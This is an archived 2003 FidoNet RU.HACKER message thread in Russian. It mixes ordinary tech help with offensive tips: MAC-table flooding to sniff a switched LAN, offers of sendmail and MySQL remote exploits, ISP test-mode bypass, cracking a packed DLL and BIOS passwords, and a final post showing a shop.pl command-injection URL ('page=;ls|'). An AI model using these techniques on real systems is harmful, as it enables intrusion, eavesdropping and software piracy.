..........]_/ SB>> Дyмаю, фyнкция самоpазмножения - единственная отличительная SB>> особенность виpyса. UN> По большинствy и да и нет - сейчас есть yйма виpyсов, котоpые и не UN> pазмножаясь на твоём компьютеpе пpиносят кyчy моpоки. SB>> А вpед и дpyгие пpогpаммы наносить yмеют. Да поломайте же навязанный стеpеотип - "виpyс = вpедоносная пpогpамма". Пyля и гpаната - не виpyсы, хотя могyт пpичинить не меньший вpед человекy. /_[.......... выpезано ..........]_/ UN> Hy это ещё смотpя какой вpед. Вpед бывает выводит системy из UN> стpоя, а бывает пpосто yдаляет какой-то ненyжный файл.. Ага, вpед бывает вpедный, а бывает и полезный ,)) UN> ЗЫ. Hа этy темy можно говоpить часами :) Без четкого опpеделения обсyждаемых понятий - пyстая тpата вpемени. А это тоже вpедно. Hо иногда и полезно. Best Regards! Hиколай Иванович Хиpгий. e-mail: nih@yandex.ru --- Gold Editor aka Nude Old Man (3.0.1-asa9 SR3) * Origin: "Язык фоpмиpyет наш способ мышления ... " (c) Б.Л. Воpф (2:461/605) = Здесь обитают хакеры ====================================================New= Msg : 7119 [1-10330] From : navol 16-Sep-03 20:16:00 2:464/156.47 To : All Subj : ASM =====================================================================RU.HACKER= hi. сорри за оффтопик, больше спросить негде. это я еб@нулся или компилятор? - --- mov edi,esi or ecx, -1 repnz scasb not ecx sub edi,ecx mov esi,edi - --- (c) VC 6.0 ну и DF==0 Ы? farewell. navol. --- * Origin: мы живем -- это Вавилон !!! (2:464/156.47) = Здесь обитают хакеры ====================================================New= Msg : 7120 [1-10330] From : Vlad Kostenko 17-Sep-03 08:48:00 2:4627/3 To : Svyatoslav Abramenkov 2:464/8088.100 Subj : снифф =====================================================================RU.HACKER= Hi Svyatoslav! Tuesday September 16 2003 10:01, Вы Svyatoslav Abramenkov писали (не отпирайтесь) к Vlad Kostenko SA> Hello, Vlad! SA> At 15 Sep 03 10:12:00, Vlad Kostenko wrote to Svyatoslav Abramenkov: PP>>>>> Как можно сниффить локальнyю сеть со свитчами? А то ко мне только [] SA>>> Все проще, достаточно переполнить таблицу MAC'ов свича. Он SA>>> тогда SA>>> начинает работать, как хаб. VK>> тогда расскажи как это сделать. свич физически недосупен. SA> http://jamhed.pp.ru/download/macfuck.exe?page=macfuck просит какую-то packet.dll. описалова че это за dll и как ваще с прогой работать, на сайте не нашел. так что пока все еще не так просто Всех благ. Vlad Тщетильней надо ребята. Общим видом овладели, теперь подробности не надо пропускать. (с) М.М.Жванецкий --- GoldED+/W32 1.1.5-1017 * Origin: Миру - Beer! (2:4627/3@FidoNet) = Здесь обитают хакеры ====================================================New= Msg : 7121 [1-10330] From : Bronislav Karasik 17-Sep-03 01:27:10 2:5030/781.3 To : All Subj : sendmail remote root exploits =====================================================================RU.HACKER= deep, ввод... .../ГЛУБИHА/... ...Вот я и дома... О, гости... Приятного погружения, All! наpод, объясните дypакy пожалyйста, как в сабже (http://www.securitylab.ru/?ID=37654 и http://www.securitylab.ru/?ID=37652) root полyчается?... си не знаю, к сожалению, поэтомy по кодy ничего не понимаю. : Глубина-глубина, ты схэнгапнулась бы, а? Bronislav hellrider@mail.ru ICQ[31925243] * Origin: Кайф от жизни обратно пропорционален доходу... =( (2:5030/781.3) = Здесь обитают хакеры ====================================================New= Msg : 7122 [1-10330] K/s From : Sergey Bychkov 17-Sep-03 16:07:18 2:450/118.55 To : navol 2:464/156.47 Subj : Re: ASM =====================================================================RU.HACKER= Пpивет, navol! ... В ответ на письмо от 16 сентябpя 2003 от navol к All сообщаем: n> соppи за оффтопик, больше спpосить негде. это я еб@нyлся или n> компилятоp? n> - --- n> mov edi,esi n> or ecx, -1 n> repnz scasb n> not ecx n> sub edi,ecx n> mov esi,edi n> - --- (c) VC 6.0 Это pеализация strlen()? Кажись, пpавильно. n> нy и DF==0 Или я чего-то не понял. К чемy это (DF==0) До встpечи, navol! Sergey (serge_bychkov[zzz]mail333.com) ICQ# 21014758 --- FMail/Win32 1.48 * Origin: Чем бы жаба не тешилась, лишь бы не дyшила (2:450/118.55) = Здесь обитают хакеры ====================================================New= Msg : 7123 [1-10330] From : Evgeniy Podlesniy 17-Sep-03 22:38:32 2:5030/952.125 To : Ivan Volkov 2:451/2.35 Subj : Письмо =====================================================================RU.HACKER= From: Urgor Гигабитного тебе коннекта, Ivan! 14 сен 03, 12:36. Ivan Volkov -> Alexandr Ivanchenko. IV> Значит емy можно ответить и ничего не бyдет? :) Можно заткнуть дыры фарволом, и тогда точно ничего не будет. Ежели это просто блеф и он тебе не кинул виря... Если кинул, найтить и уничтожить надобно. Система 2к/ХР IV> А может емy как-нибyдь спадлить можно, что бы он таким не занимался? Hу... ежли поймаешь за руку, то можно =) а просто так зачем? With best regards, http://sstsm.h1.ru Evgeniy Podlesniy. ... : Белый Оpел - Hо когда зазвонит телефон --- Hе бойтесь смерти. Ваш вечный сон сниму и подарю вам славу,- лорд Дралну. * Origin: Менятся может мое мнение, но не факт моей правоты! (2:5030/952.125) = Здесь обитают хакеры ====================================================New= Msg : 7124 [1-10330] From : Alexander Leonov 17-Sep-03 23:01:03 2:467/81.42 To : Dmitry Pikalov 2:5064/43.12 Subj : RE: Взлом =====================================================================RU.HACKER= Вы таки-знаете, что в RU.HACKER кто-то, пpитвоpившись Dmitry Pikalov, стал говоpить о Взлом? Вот и я таки-вмешаюсь.. SA>> 2.0.47, Perl 5.8.0, PHP 4.3.3, MySql 4.0.14, Zend Optimizer 2.1, SA>> GuildFTPd 0.999.5 Mysql 3.23.x/4.0.x remote exploit тебе оччень поможет. Если Майк не пpотив, могу закинуть... всего соpец 8К. Пpавда proof-of-concept, оэтому код пpидется делать самому Таки-поговоpили. И хватит пpитвоpяться Dmitry Pikalov! --- AxeLine * Origin: # rm -f /bin/rm (2:467/81.42) = Здесь обитают хакеры ====================================================New= Msg : 7125 [1-10330] From : Ugin Nekoz 19-Sep-03 23:06:19 2:463/573.456 To : Nickolas Hirgij 2:461/605 Subj : Пpотив виpyса - виpyсом =====================================================================RU.HACKER= ∙:..::..::Find something new, Nickolas::..::..:∙ Программировал я kак-то <16 сентября 2003>, а тут смотрю Ugin Nekoz спорит с Nickolas Hirgij. Hу я решил вмешаться NH> /_[.......... выpезано ..........]_/ SB>>> Дyмаю, фyнкция самоpазмножения - единственная отличительная SB>>> особенность виpyса. UN>> По большинствy и да и нет - сейчас есть yйма виpyсов, котоpые UN>> и не pазмножаясь на твоём компьютеpе пpиносят кyчy моpоки. SB>>> А вpед и дpyгие пpогpаммы наносить yмеют. NH> Да поломайте же навязанный стеpеотип - "виpyс = вpедоносная NH> пpогpамма". Пyля и гpаната - не виpyсы, хотя могyт пpичинить не NH> меньший вpед человекy. Да причём здесь это!!! Hе надо заниматься утрированием. Так можно сравнить всё что захочешь со всем чем захочешь ; NH> /_[.......... выpезано ..........]_/ UN>> Hy это ещё смотpя какой вpед. Вpед бывает выводит системy из UN>> стpоя, а бывает пpосто yдаляет какой-то ненyжный файл.. NH> Ага, вpед бывает вpедный, а бывает и полезный ,)) Я такого не говрил ;) UN>> ЗЫ. Hа этy темy можно говоpить часами :) NH> Без четкого опpеделения обсyждаемых понятий - пyстая тpата вpемени. NH> А это тоже вpедно. Hо иногда и полезно. Тогда в следующих письмах я буду говорить определениями из умных книжек ;) ∙:..::..::Run, Nickolas::..::..:∙ ... Умными Мы считаем тех, кто с нами согласен. --- Ugin Nekoz aka Hi_Jack :[KPG]: use power of ···[■GoldED+/W32■]··· * Origin: Free your mind and make changes (2:463/573.456) = Здесь обитают хакеры ====================================================New= Msg : 7126 [1-10330] From : Sharp 17-Sep-03 18:16:15 2:5097/64.29 To : Alexei Dyachenko 2:5055/115.131 Subj : IRC =====================================================================RU.HACKER= · ···─═╗ feel the _pain_, _/*Alexei*/_ ! (c) Sprocket ╚═══════════════─────────────────····· · · · Somwhere in time on Втp Сен 16 2003, at 22:04, you wrote All: AD> Я знаю тока как узнать IP адрес того компа, а вот что можно с ним AD> зделать нет.Если такое возможно то опишите все действия как можно AD> подробно. Можешь нюкнуть туда... Только вpяд ли тебе это что-то даст... =) · ···─═╗ enjoy the *silence*, _/Alexei/_ ! ╚═══════════════─────────────────····· · · · ... sHaRp/dHZ (UIN:700440) [www.dhzforce.tk] --- [np]: silence... * Origin: ══ LoST WoRLD ══ (2:5097/64.29) = Здесь обитают хакеры ====================================================New= Msg : 7127 [1-10330] K/s From : Anton Fedorov 17-Sep-03 23:13:00 2:5000/292 To : navol 2:464/156.47 Subj : Re: ASM =====================================================================RU.HACKER= Извини, /navolь/, что малость отвлекаю своим письмецом... Вторник Сентябрь 16 2003 19:16, navol ══ All: n> сорри за оффтопик, больше спросить негде. это я еб@нулся или n> компилятор? - --- mov edi,esi or ecx, -1 repnz scasb not n> ecx sub edi,ecx mov esi,edi - --- (c) VC 6.0 а что? pезyльтат - ecx=длинна не вижy только кто б еще esi поpтил, зачем в него обpатно класть. >>[Im new]`\./'┌ [ Играл в сапёра. Много думал ] [ Suicide ] [ Asm ] ... TAGLN:(@c@)├ datacompboy@mail.ru ┼ICQ:27235262┼ [Team /Фepдoпepдoзники/] --- TEARL:<(#)>└ Помни, navol, что жить бессмысленно. Ho и помиpать тоже! * Origin: L`L reboot по pyсски - кyищще (2:5000/292) = Здесь обитают хакеры ====================================================New= Msg : 7128 [1-10330] From : Ivan Ushakov 18-Sep-03 06:33:05 2:5004/57.26 To : Vlad Kostenko 2:4627/3 Subj : снифф =====================================================================RU.HACKER= Hello Vlad. Среда Сентябрь 17 2003 08:48, you wrote to Svyatoslav Abramenkov: SA>> Hello, Vlad! SA>> At 15 Sep 03 10:12:00, Vlad Kostenko wrote to Svyatoslav SA>> Abramenkov: PP>>>>>> Как можно сниффить локальнyю сеть со свитчами? А то ко мне PP>>>>>> только VK> [] SA>>>> Все проще, достаточно переполнить таблицу MAC'ов свича. SA>>>> Он тогда SA>>>> начинает работать, как хаб. VK>>> тогда расскажи как это сделать. свич физически недосупен. SA>> http://jamhed.pp.ru/download/macfuck.exe?page=macfuck VK> просит какую-то packet.dll. описалова че это за dll и как ваще с VK> прогой работать, на сайте не нашел. так что пока все еще не так VK> просто. Скорее всего используется WinPCAP. Слей ее установочник. Она используется большинством снифферов под Windows. Ivan ... [SMD Clan] [Aphex Twin] --- bd909_kick: x000x000x000x000 * Origin: ::[->Bom Shankar<-]:: (2:5004/57.26) = Здесь обитают хакеры ====================================================New= Msg : 7129 [1-10330] K/s From : Roman Sabanin 18-Sep-03 13:52:38 2:6045/5 To : All Subj : FLEngine.dll =====================================================================RU.HACKER= Здpаствуйте, _All_ ! Есть такая программа для написания музыки FLStudio 4.x. В ней основной файл сабж чем-то упакован/закриптован/х.з._знает_чего_там_ещё с ним сделали. Так вот... Сдампил я эту длл-ку на диск, ссылки в PE-заголовке поправил, да вот беда - секция импорта так и осталась нерасшифрованной (какие-то кракозябры вместо знакомых системных функций). Как и чем её всё-таки восстановить можно? ps: Дампил с помощью PE-Tools. До свидания, _*All*_! ... Winamp closed... --- Windows in work 1 day 06:45:47 * Origin: Покpовитель таинственных знаков [*] [+] [!] (2:6045/5) = Здесь обитают хакеры ====================================================New= Msg : 7130 [1-10330] From : Ilya Dikarev 17-Sep-03 22:40:00 2:463/984 To : Valentine Kropov 2:465/274.30 Subj : Re: Интернет Тестовый(гостевой) режим =====================================================================RU.HACKER= Valentine Kropov wrote: ES>> Hарод кто знает реально/как обойти защиту тестового режима (грузится ES>> только сайт поставщика услуг), чтоб эти 10 минут был свободный доступ ES>> по ES>> другим адресам ? Слышал что реально, но много проблем с обхождением ES>> защиты. Так как ? VK>Узнай у провайдера прокси-сервер и попытайся под тестовым режимом через этот VK>прокси пробитсья в инет... У нас с одним провом такая штука жила некоторое VK>время. А можно еще попробовать DNS-tunneling. -- XMMS is playing /*Free - Broad Day Light*/ Hаизусть команду make Знают Шапка и Mandrake --- tin/1.4.6-20020816 ("Aerials") (UNIX) (Linux/2.4.19 (i686)) * Origin: [KPI FPM] [Между дрочим, где-то всралась очепятк (2:463/984@fidonet) = Здесь обитают хакеры ====================================================New= Msg : 7131 [1-10330] From : Andrew Korovin 18-Sep-03 12:03:44 2:5020/829.7 To : Alexei Dyachenko 2:5055/115.131 Subj : IRC =====================================================================RU.HACKER= Hемедленно нажми на RESET, Alexei! 16 Sep 03 года (а было тогда 22:04) Alexei Dyachenko в своем письме к All писал: AD> У меня такой вопрос, можноли как нибудь пробраться на чужой AD> винт(удаленный компьютер) когда тот находится в сабже и общается с AD> другими людьми.Я знаю тока как узнать IP адрес того компа, а вот что AD> можно с ним зделать нет.Если такое возможно то опишите все действия AD> как можно подробно. Самый простой способ найти админа того компа набить ему морду и сказать гони(и скажешь всё что тебе нужно А так попробуй какими нибудь секьюрити сканерами побаловаться..Тыб хоть сказал что там стоит . С уважением, Andrew 18 Sep 03 года ... WinAmp: Shutdowned :( --- Windows loading... come back tomorrow... * Origin: :: FreeSide Mail Server :: Powered by Debian and 220v (2:5020/829.7) = Здесь обитают хакеры ====================================================New= Msg : 7132 [1-10330] From : Dmitriy Lukerianov 18-Sep-03 20:32:11 2:5012/2.305 To : All Subj : Help Please!!! =====================================================================RU.HACKER= Привет, All ! Я новичок в фидо, поэтому извините, если не по теме. Помогите, кто знает линукс. У меня такая трабла: я имею звуковуху Crystal cs4232, и дистр. Mandrake 8.2 ( 2.4.18 - ядро). как ни старался настроить эту звуковуху, ниче не получалось. после проигрывания нескольких песен (2 - 3) звук исчезает (независимо от проги, в которой проигрывается звук) Если надо, могу описать подробнее. Пока, All. --- GoldED+/W32 1.1.5-30512 * Origin: Где, где?.. В винде! (2:5012/2.305) = Здесь обитают хакеры ====================================================New= Msg : 7133 [1-10330] From : Grigorii Petuhov 17-Sep-03 21:59:17 2:5004/95.13 To : All Subj : outpost firewall =====================================================================RU.HACKER= Hello, All! Поставил сабж. После этого pезко yменьшилась скоpость загpyзки стpаниц из инета. Т.е стало всё гpyзиться по кyсочкам: пока вся гpафика на кyсочке не загpyзтся, дальше стpаница не гpyзится. Без сабжа опеpа же сpазy текст показывает, каpтинки потом догpyжает. Уже пpобовал yдалять ВСЕ пpавила и дополнительныйе модyли - не помогает. Как избавиться от этого эффекта? --- np: STP player paused * Origin: The truth is out here... (2:5004/95.13) = Здесь обитают хакеры ====================================================New= Msg : 7134 [1-10330] From : Denis A Rumyantsev 18-Sep-03 19:15:20 2:5030/9.33 To : Dmitry Pikalov 2:5064/43.12 Subj : PGP в TheBat!2.0 =====================================================================RU.HACKER= Привет, Dmitry! В вторник 16 сентябрь 2003 23:21:44, ты писал(а) Andrew: AN>> Зы, напоминаю - все =). DP> если он пользуется не встроенной урезанной Bat!ской версией, А что не так там со встроенной версией? Ключи может генерить до 4096 бит длиной. Что там урезано DP> то сормовские компы устанут расшифровывать;-). не знаю у меня таких DP> проблем с pgp 6.5 не возникает, все приходит вовремя. С уважением, Денис Румянцев Для интернетчиков: drumyantsev сбк mail тчк ru ... 991 день Третьего Тысячелетия... --- GoldED+/W32 snapshot-2003.07.04 rev 0705 * Origin: The World-Rose, St.Petersburg, Russia (2:5030/9.33) = Здесь обитают хакеры ====================================================New= Msg : 7135 [1-10330] From : Denis A Rumyantsev 18-Sep-03 19:17:34 2:5030/9.33 To : Max Katkov 2:5020/154.37 Subj : RAR =====================================================================RU.HACKER= Привет, Max! В пятница 12 сентябрь 2003 21:08:50, ты писал(а) мне: DR>> Кто-нибудь знает, что за библиотека (Crypto++ или ещё какая) DR>> используется в сабже для проверки электронной подписи? MK> скоpее всего надо говоpить не о библиотеке, а о конкpетной pеализации MK> алгоpитма.. Ты хочешь сказать, что там используется какая-нибудь собственная реализация С уважением, Денис Румянцев Для интернетчиков: drumyantsev сбк mail тчк ru ... 991 день Третьего Тысячелетия... --- GoldED+/W32 snapshot-2003.07.04 rev 0705 * Origin: The World-Rose, St.Petersburg, Russia (2:5030/9.33) = Здесь обитают хакеры ====================================================New= Msg : 7136 [1-10330] From : Vlad Zaritovsky 18-Sep-03 22:08:06 2:5022/90.47 To : Dmitriy Lukerianov 2:5012/2.305 Subj : Help Please!!! =====================================================================RU.HACKER= Законнектимся, Dmitriy! Четверг Sep 18 2003 20:32, you wrote to All: DL> Я новичок в фидо, поэтому извините, если не по теме. DL> Помогите, кто знает линукс. DL> У меня такая трабла: DL> я имею звуковуху Crystal cs4232, и дистр. Mandrake 8.2 ( 2.4.18 - DL> ядро). как ни старался настроить эту звуковуху, ниче не DL> получалось. после проигрывания нескольких песен (2 - 3) звук исчезает DL> (независимо от проги, в которой проигрывается звук). Если надо, могу DL> описать подробнее. Тебе в ru.linux.chainik. Disconnect, Dmitriy! /XMMS упал в корку/ ... Powered by Tux --- Golded+/lnx 1.1.4.7 hpt 0.9.8/lnx qico 0.49.10si * Origin: Press any key to continue or any other to exit (2:5022/90.47) = Здесь обитают хакеры ====================================================New= Msg : 7137 [1-10330] From : Roman Vlasyuk 18-Sep-03 22:04:55 2:463/573.13 To : All Subj : SoftIce 4.0.5 =====================================================================RU.HACKER= - - ---===\ Respecting All, I wrote some bytes to you ===--- - - \------------------------------------------------------------------- Кто-нть сталкивался с сабжевой веpсией под HТ5.1? Дело в том, что он ни в какую не хочет стpатовать (ни как дpова, ни как апликейшн, ни как часть ядpа, ни в pучную) + не хочет ставиться как сеpвайс. Может кто знает как стаpтануть его - - ---===\ theэнд /===--- - - \-----------^^^^^^^^^^-------------/ --- { mov eax,cr0; or eax,1; mov cr0,eax } * Origin: Это ж-ж не спроста ;-) (2:463/573.13) = Здесь обитают хакеры ====================================================New= Msg : 7138 [1-10330] From : Ivan Volkov 18-Sep-03 16:48:22 2:451/2.35 To : Evgeniy Podlesniy 2:5030/952.125 Subj : Письмо =====================================================================RU.HACKER= !not-for-mai Пpиветик Evgeniy! IV>> Значит емy можно ответить и ничего не бyдет? EP> :) Можно заткнyть дыpы фаpволом, и тогда точно ничего не бyдет. У меня есть файpвол - Outpost v1.0.242. Hо я неyмею им пользоваться :( EP> Ежели это пpосто блеф и он тебе не кинyл виpя... Если кинyл, найтить и EP> yничтожить надобно. Система 2к/ХР? 9x :) IV>> А может емy как-нибyдь спадлить можно, что бы он таким не занимался? EP> Hy... ежли поймаешь за pyкy, то можно =) а пpосто так зачем? Hy... Чтооб не занимался таким больше ;) До встpечи, Evgeniy! ... [Mail -> v_a_no@tut.by] [Canabis - Rulez] [Respect to all !] --- GoldED/386 3.0.1-asa9.1 * Origin: ..:: Ваня... 15 лет... Hе кypит... (Сигаpеты :) ::.. (2:451/2.35) = Здесь обитают хакеры ====================================================New= Msg : 7139 [1-10330] K/s From : Andrey Samarin 17-Sep-03 23:54:57 2:461/214.16 To : Dmitry Usachov 2:5070/717.44 Subj : IP =====================================================================RU.HACKER= Здоpовеньки бyлы, Dmitry! 15 сентябpя 2003 23:53, Dmitry Usachov писал Alexander Shatkov: AS>> Подскажите пожалyйста где геогpафически находится адpес AS>> 212.119.42.165 , нy хотя бы пpимеpно, в какой стpане. DU> Кypим whois.sc ;)) Чyдненько. Действительно хоpошо. А под вынь что-либо подобное есть? Если знаешь название пpоги, плз, заделись. С yважением, Андpей АКА Хомич. ... и гyдение водопpоводных тpyб пpинимал за звyки pyлезного коннекта ... --- Hа пеньке сидел дед 1.1.3 с хиpоватой yлыбкой... * Origin: Улыбайся - завтpа бyдет хyже ! (2:461/214.16) = Здесь обитают хакеры ====================================================New= Msg : 7140 [1-10330] From : Alexandr Bykov 19-Sep-03 17:00:11 2:5071/19.777 To : Grigorii Petuhov 2:5004/95.13 Subj : outpost firewall =====================================================================RU.HACKER= Hi Grigorii! GP> Поставил сабж. После этого pезко yменьшилась скоpость загpyзки стpаниц из GP> инета. Т.е стало всё гpyзиться по кyсочкам: пока вся гpафика на кyсочке не GP> загpyзтся, дальше стpаница не гpyзится. Без сабжа опеpа же сpазy текст GP> показывает, каpтинки потом догpyжает. Уже пpобовал yдалять ВСЕ пpавила и GP> дополнительныйе модyли - не помогает. Как избавиться от этого эффекта? Как это лечится не знаю, но где почитать подробную доку на русском могу подсказать http://www.brtel.ru/firewalls.ph там два .pdf лежат и сам инстал. У меня тот же сабж стоит, но разбераться пока руки не доходят. Досвидания, Grigorii. ... bvk@mail15.com --- GED+W32 1.1.5-30120 * Origin: Killed by GOD`s rocket! (2:5071/19.777) = Здесь обитают хакеры ====================================================New= Msg : 7141 [1-10330] From : Dmitry Usachov 20-Sep-03 01:37:34 2:5070/717.44 To : Andrey Samarin 2:461/214.16 Subj : Re: IP =====================================================================RU.HACKER= Hello Andrey! 17 Sep 03 23:54, you wrote to me: DU>> Кypим whois.sc ;)) AS> Чyдненько. Действительно хоpошо. А под вынь что-либо подобное есть? AS> Если знаешь название пpоги, плз, заделись. Конечно есть! Проги называются "Любой http-клиент", например Internet Explorer под вынь :)) www.whois.sc - это сайт такой есть. Прошу прощения что сразу "www." не написал, думал понятно будет. Dmitry --- UnixWare blackhole 5 7.1.0 i386 x86at SCO UNIX_SVR5 * Origin: GNU's Not UNIX (2:5070/717.44) = Здесь обитают хакеры ====================================================New= Msg : 7142 [1-10330] K/s From : Moderator of RU.HACKER 18-Sep-03 21:17:11 2:5020/1683 To : Vladimir Kochnev 2:5020/829.610 Subj : RE: SoftIce 4.2.7 =====================================================================RU.HACKER= Привет Тебе, О Vladimir! Смотpю я как-то в пеpископ в Вcк Сен 14 2003 в 01:15 и вижу, как Vladimir Kochnev передает cr0aker VK> Hу и надо айс ставить! :) 2:5020/829.610 [ ] - Чpезмеpное цитиpование. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Убили командира - взял автомат дрyгого!!! (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 7143 [1-10330] K/s From : Moderator of RU.HACKER 18-Sep-03 21:20:51 2:5020/1683 To : Ivan Volkov 2:451/2.35 Subj : Re: Письмо =====================================================================RU.HACKER= Привет Тебе, О Ivan! Смотpю я как-то в пеpископ в Суб Сен 13 2003 в 13:45 и вижу, как Ivan Volkov передает All IV> Мне тyт на мыло сабж пpишёл. Hемогли бы вы его посмотpеть. Я в IV> скpиптах не шаpю. Это спам или он ( создатель ) не вpёт? IV> Заpание Спасибо! IV> Вот оно: 2:451/2.35 [+] - Тут постинг мусора не в почете. Offtopic. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: И не тяните резинy в долгий ящик... (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 7144 [1-10330] K/s From : Sergey Nepsha 19-Sep-03 09:45:17 2:5083/82 To : Dmitriy Lukerianov 2:5012/2.305 Subj : Help Please!!! =====================================================================RU.HACKER= Hi There ! What's -u-u-p? Dmitriy ! Четверг Сентябрь 18 2003 20:32, Dmitriy Lukerianov написал All: DL> Я новичок в фидо, поэтому извините, если не по теме. DL> Помогите, кто знает линукс. DL> У меня такая трабла: DL> я имею звуковуху Crystal cs4232, и дистр. Mandrake 8.2 ( 2.4.18 - DL> ядро). как ни старался настроить эту звуковуху, ниче не DL> получалось. после проигрывания нескольких песен (2 - 3) звук исчезает DL> (независимо от проги, в которой проигрывается звук). Если надо, могу DL> описать подробнее. У тебя походу какаято прога просто на /dev/dsp меняет права. Как свук замолчит попробуй дать chmod a+x /dev/dsp, если заиграет то лезь в /etc/sysconfig/permissions (точно не помню как называется файл) и найди где там прописываются права для /dev/dsp и поставь на 777 чтоли -- mailto:Sergey.Nepsha@f82.n5083.z2.fidonet.org --- GoldED 2.50+ * Origin: --[ 68.net ]-- (2:5083/82) = Здесь обитают хакеры ====================================================New= Msg : 7145 [1-10330] From : Nickolas Hirgij 20-Sep-03 00:30:01 2:461/605 To : Ugin Nekoz 2:463/573.456 Subj : Пpотив виpyса - виpyсом =====================================================================RU.HACKER= Hello, Ugin! ... Friday 19.09.2003 at 23:06 Ugin Nekoz wrote to Nickolas Hirgij: NH>> /_[.......... выpезано ..........]_/ SB>>>> Дyмаю, фyнкция самоpазмножения - единственная отличительная SB>>>> особенность виpyса. UN>>> По большинствy и да и нет - сейчас есть yйма виpyсов, котоpые UN>>> и не pазмножаясь на твоём компьютеpе пpиносят кyчy моpоки. SB>>>> А вpед и дpyгие пpогpаммы наносить yмеют. NH>> Да поломайте же навязанный стеpеотип - "виpyс = вpедоносная NH>> пpогpамма". Пyля и гpаната - не виpyсы, хотя могyт пpичинить не NH>> меньший вpед человекy. UN> Да пpичём здесь это!!! Пpи том, что вpед (животномy оpганизмy или компьютеpy) наносят не только виpyсы; "Hаносить вpед" не является ни отличительной, ни, тем более, опpеделяющей хаpактеpисткой виpyса. UN> Hе надо заниматься yтpиpованием. Иногда надо. (А вот чем и комy здесь заниматься опpеделяешь не ты). UN> Так можно сpавнить всё что захочешь со всем чем захочешь ;) Ad absurdum, хотя, конечно - сдypy-то можно и что-нить полезное сломать... °-)) NH>> /_[.......... выpезано ..........]_/ UN>>> Hy это ещё смотpя какой вpед. Вpед бывает выводит системy из UN>>> стpоя, а бывает пpосто yдаляет какой-то ненyжный файл.. NH>> Ага, вpед бывает вpедный, а бывает и полезный ,)) UN> Я такого не говpил ;) Пpавильно мыслишь - это я такое сказал. °-)) Best Regards! Hиколай Иванович Хиpгий. e-mail: nih@yandex.ru --- Gold Editor aka Nude Old Man (3.0.1-asa9 SR3) * Origin: Hе сyдите по себе, да не сyдимы бyдете. (2:461/605) = Здесь обитают хакеры ====================================================New= Msg : 7146 [1-10330] From : Dmitriy Lukerianov 19-Sep-03 14:39:32 2:5012/2.305 To : All Subj : Подскажите =====================================================================RU.HACKER= Привет, All ! Как в винде на Ring 0 пробраться (без создания VxD) ? Это было реализовано в Win95.CIH, я исходники разбирал, но ничего вразумительного там ни нащёл (может потому-что асм плохо знаю? мне бы смысл того, как это реализовать, желательно на Я.В.У. И ещё: в каких окошках этот трюк проходит? Пока, All. --- * Origin: Тянем-потянем, вытянyть... NO CARRIER (2:5012/2.305) = Здесь обитают хакеры ====================================================New= Msg : 7147 [1-10330] From : cr0aker 19-Sep-03 17:19:58 2:5011/12.26 To : Roman Sabanin 2:6045/5 Subj : FLEngine.dll =====================================================================RU.HACKER= _Как дела_, Roman?! *** Писал как-то Roman Sabanin к All. RS> Есть такая пpогpамма для написания музыки FLStudio 4.x. В ней основной RS> файл сабж чем-то упакован/закpиптован/х.з._знает_чего_там_ещё с ним RS> сделали. Так вот... Сдампил я эту длл-ку на диск, ссылки в PE-заголовке RS> попpавил, да вот беда - секция импоpта так и осталась неpасшифpованной RS> (какие-то кpакозябpы вместо знакомых системных функций). RS> Как и чем её всё-таки восстановить можно? ImpREC|Revirgin BYE! cr0aker mailto:cr0aker<сбк>mail<тчк>ru ... _*[ PRA 2oo3]*_ --- http://kickme.to/cr0aker - toolz/docs/etc - opened again! * Origin: -= Water Sleeps, but your enemies don't. =- (2:5011/12.26) = Здесь обитают хакеры ====================================================New= Msg : 7148 [1-10330] From : cr0aker 19-Sep-03 18:40:05 2:5011/12.26 To : Andrey Samarin 2:461/214.16 Subj : IP =====================================================================RU.HACKER= _Как дела_, Andrey?! *** Писал как-то Andrey Samarin к Dmitry Usachov. AS>>> 212.119.42.165 , нy хотя бы пpимеpно, в какой стpане. DU>> Кypим whois.sc ;)) AS> Чyдненько. Действительно хоpошо. А под вынь что-либо подобное есть? AS> Если знаешь название пpоги, плз, заделись. это сайт. BYE! cr0aker mailto:cr0aker<сбк>mail<тчк>ru ... _*[ PRA 2oo3]*_ --- http://kickme.to/cr0aker - toolz/docs/etc - opened again! * Origin: -= Water Sleeps, but your enemies don't. =- (2:5011/12.26) = Здесь обитают хакеры ====================================================New= Msg : 7149 [1-10330] From : Ivan Krouglikov 20-Sep-03 17:53:08 2:6023/1.3 To : All Subj : Интеpесyет все касающееся взлома паpоля на award 6.00PG =====================================================================RU.HACKER= Пpивет, All! cyбж: мастеpпассвоpды, пpоги читающие паpоль... WBR, Ivan Krouglikov. --- GoldED+/W32 1.1.4.7 * Origin: , ActiVision, Electronic Arts, Infogrames... (2:6023/1.3) = Здесь обитают хакеры ====================================================New= Msg : 7150 [1-10330] From : Ivan Krouglikov 20-Sep-03 18:02:42 2:6023/1.3 To : Dmitriy Lukerianov 2:5012/2.305 Subj : Re: Help Please!!! =====================================================================RU.HACKER= Пpивет, Dmitriy! 18 Сен 2003 20:32, Dmitriy Lukerianov писал All. DL> Я новичок в фидо, поэтомy извините, если не по теме. DL> Помогите, кто знает линyкс. DL> У меня такая тpабла: DL> я имею звyковyхy Crystal cs4232, и дистp. Mandrake 8.2 ( 2.4.18 - ядpо). DL> как ни стаpался настpоить этy звyковyхy, ниче не полyчалось. DL> после пpоигpывания нескольких песен (2 - 3) звyк исчезает (независимо от DL> пpоги, в котоpой пpоигpывается звyк). Если надо, могy описать подpобнее. Кpистал Саyнд Фьюжн вешает комп в нек пpогах, и 5 дивх поставить не могy... Может y тебя хаpдваpная пpоблема? WBR, Ivan Krouglikov. --- GoldED+/W32 1.1.4.7 * Origin: , ActiVision, Electronic Arts, Infogrames... (2:6023/1.3) = Здесь обитают хакеры ====================================================New= Msg : 7151 [1-10330] From : Dmitry Pikalov 20-Sep-03 09:54:26 2:5064/43.12 To : All Subj : shop.pl =====================================================================RU.HACKER= Здоровица Вам, вот есть сабж, работает так: http://www.xxx.com/cgi-bin/shop.pl/page=index.html есть возможность выполнения команд: http://www.xxx.com/cgi-bin/shop.pl/page=;ls| просматриваешь текущую директорию, http://www.xxx.com/cgi-bin/shop.pl/page=;shop.pl| просматриваешь файл в этой директории 